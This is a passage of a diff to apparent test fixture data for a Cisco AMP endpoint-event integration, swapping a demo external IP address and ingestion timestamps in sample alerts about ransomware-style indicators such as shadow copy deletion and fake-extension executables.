malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", + "ingested": "2021-12-09T13:35:29.222460200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -896,7 +896,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -951,7 +951,7 @@ "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -961,8 +961,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322439389Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", + "ingested": "2021-12-09T13:35:29.222464300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:04:56.000Z", @@ -983,7 +983,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1038,7 +1038,7 @@ "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1048,8 +1048,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:13:59.322441669Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", + "ingested": "2021-12-09T13:35:29.222469Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:04:49.000Z", @@ -1070,7 +1070,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1125,7 +1125,7 @@ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1135,8 +1135,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322443929Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", + "ingested": "2021-12-09T13:35:29.222474300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:03:40.000Z", @@ -1158,7 +1158,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1206,7 +1206,7 @@ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1216,8 +1216,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322446200Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "ingested": "2021-12-09T13:35:29.222479200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1234,7 +1234,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Unknown", @@ -1279,7 +1279,7 @@ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1289,8 +1289,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322448420Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "ingested": "2021-12-09T13:35:29.222483300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1307,7 +1307,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Unknown", @@ -1352,7 +1352,7 @@ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1362,8 +1362,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322450805Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "ingested": "2021-12-09T13:35:29.222488100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1380,7 +1380,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Unknown", @@ -1425,7 +1425,7 @@ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1435,8 +1435,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322453046Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "ingested": "2021-12-09T13:35:29.222493900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not 